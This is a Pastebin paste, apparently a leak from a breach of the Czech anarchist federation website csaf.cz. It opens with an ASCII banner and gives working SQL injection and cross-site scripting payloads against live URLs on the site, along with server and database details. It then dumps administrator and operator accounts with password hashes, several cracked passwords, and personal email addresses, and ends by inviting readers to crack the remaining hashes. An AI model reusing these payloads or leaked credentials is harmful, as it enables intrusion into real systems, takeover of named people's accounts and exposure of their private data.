API tools faq
paste
Advertisement
sroub3k

csaf.cz

sroub3k
Feb 2nd, 2012
403
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.19 KB | None | 0 0
raw download clone embed print report
  1. /\ \ /\ \ /\ \ /\ \
  2. /::\ \ /::\ \ /::\ \ /::\ \
  3. /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \
  4. /:/ \:\ \ _\:\~\ \ \ /::\~\:\ \ /::\~\:\ \
  5. /:/__/ \:\__\ /\ \:\ \ \__\ /:/\:\ \:\__\ /:/\:\ \:\__\
  6. \:\ \ \/__/ \:\ \:\ \/__/ \/__\:\/:/ / \/__\:\ \/__/
  7. \:\ \ \:\ \:\__\ \::/ / \:\__\
  8. \:\ \ \:\/:/ / /:/ / \/__/
  9. \:\__\ \::/ / /:/ /
  10. \/__/ \/__/ \/__/
  11. *- Československá anarchistická federace -*
  12.  
  13. ||| Boolean Based SQL Injection
  14.  
  15. Severity: Critical
  16. Confirmation: Confirmed
  17. URL : http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
  18. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  19. Parameter Name: teor_cl
  20. Parameter Type: Querystring
  21. Attack Pattern: -1 OR 17-7=10
  22.  
  23. ||| Cross-site Scripting
  24.  
  25. Severity: Important
  26. Confirmation: Confirmed
  27. URL: http://www.csaf.cz/rss_adresa.php?'"--></style></script><script>alert(0x0006E3)</script>
  28. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  29. Parameter Name: Query Based
  30. Parameter Type: FullQueryString
  31. Attack Pattern: '"--></style></script><script>alert(0x0006E3)</script>
  32.  
  33. ||| [Possible] PHP Source Code Disclosure
  34.  
  35. Severity: Medium
  36. Confirmation: Confirmed
  37. URL: http://www.csaf.cz/obrazky/MD4-log-584jpg
  38. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  39.  
  40. ||| Info db
  41.  
  42. Target: http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
  43. Web Server: Apache/2.2.16 (Debian)
  44. Powered-by: PHP/5.3.21-1~dotdeb.0
  45. DB Server: MySQL
  46. Resp. Time(avg): 6703 ms
  47. Current User: csaf@localhost
  48. Sql Version: 5.1.58-1~dotdeb.1
  49. Current DB: csaf
  50. System User: csaf@localhost
  51. Host Name: csaf.cz
  52. Installation dir: /usr/
  53. DB User: 'csaf'@'localhost'
  54. Data Bases: information_schema, csaf
  55.  
  56. |||
  57.  
  58. csaf.phpadmin is 2
  59.  
  60. login=csaf
  61. heslo=56813b460515ecb8 / stepik
  62.  
  63. login=sstevko
  64. heslo=0d33a3ae54d3b59e / otpor
  65.  
  66. |||
  67.  
  68. csaf.admin is 1
  69. Data Found: login=lenka
  70. Data Found: heslo_new=e5a56cf0818d464cef1103f39babf57d
  71.  
  72. |||
  73.  
  74. csaf.Operatori is 12
  75.  
  76. jmeno=-fk-
  77. heslo=2074516a7196a34df7a05e7f4c157ac9
  78. aktivni=1
  79. operatori_id=pedestre
  80. kontakt=pedestre@csaf.cz
  81. help=0
  82. prava=:fsechna:
  83.  
  84. jmeno=-ll-
  85. heslo=2b8e6d0e60ae7da93e4fe214d2781f2e
  86. aktivni=0
  87. operatori_id=gaston
  88. kontakt=
  89. help=1
  90. prava=:distro_cz:
  91.  
  92. jmeno=[e]
  93. heslo=81174b6e3e394a23d91028074a067a98
  94. aktivni=1
  95. operatori_id=egil
  96. kontakt=
  97. help=1
  98. prava=:edit:edit_cizi:
  99.  
  100. jmeno=dsa
  101. heslo=8fd0cd9c7a4456b25f1dc344add6d7e4
  102. aktivni=0
  103. operatori_id=testerek
  104. kontakt=
  105. help=1
  106. prava=:edit:edit_cizi:distro_cz:pokrocile:doc:linky:
  107.  
  108. jmeno=gege
  109. heslo=2846f194dd0235954bb9ddb6af53f0c8
  110. aktivni=0
  111. operatori_id=druhy_tester
  112. kontakt=sulinek@sourek.sk
  113. help=1
  114. prava=:
  115.  
  116. jmeno=Kovac
  117. heslo=18df8b4a321e13de1590f52cab122220
  118. aktivni=0
  119. operatori_id=kovac
  120. kontakt=
  121. help=1
  122. prava=:edit:edit_cizi:distro_cz:doc:linky:
  123.  
  124. jmeno=Krystufek
  125. heslo=3fc9acc73318b183e643b765d2f9404c
  126. aktivni=0
  127. operatori_id=krystufek
  128. kontakt=
  129. help=1
  130. prava=:edit:edit_cizi:linky:
  131.  
  132. jmeno=O.H.
  133. heslo=3f7c4756e067384eb19e87dcff2baec9
  134. aktivni=1
  135. operatori_id=stanislav.rubes
  136. kontakt=zadam@si.mail
  137. help=1
  138. prava=:edit:edit_cizi:distro_cz:pokrocile:doc:linky:
  139.  
  140. jmeno=Ond?ej
  141. heslo=bf0f350c72874e8c10eab29603c6eb3f
  142. aktivni=0
  143. operatori_id=honza
  144. kontakt=
  145. help=1
  146. prava=:distro_cz:
  147.  
  148. jmeno=Tar
  149. heslo=25f09991694a8149d44d708c510c99c1
  150. aktivni=0
  151. operatori_id=roza
  152. kontakt=
  153. help=0
  154. prava=:edit:distro_cz:linky:
  155.  
  156. jmeno=xmstislavx
  157. heslo=c7287236dc984656f0598070ea69b3b4
  158. aktivni=0
  159. operatori_id=mstislav
  160. kontakt=zadam@si.mail
  161. help=1
  162. prava=:edit:
  163.  
  164. jmeno=xsvatoplukx
  165. heslo=73bcaaa458bff0d27989ed331b68b64d
  166. aktivni=1
  167. operatori_id=svatopluk
  168. kontakt=csaf.ostrava@gmail.com
  169. help=1
  170. prava=:edit:edit_cizi:distro_cz:
  171.  
  172. |||
  173.  
  174. 3f7c4756e067384eb19e87dcff2baec9 is 852456
  175. 73bcaaa458bff0d27989ed331b68b64d is iddqd
  176. 18df8b4a321e13de1590f52cab122220 is jo98ska
  177.  
  178. In the next decoding md5 strings can anyone continue :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!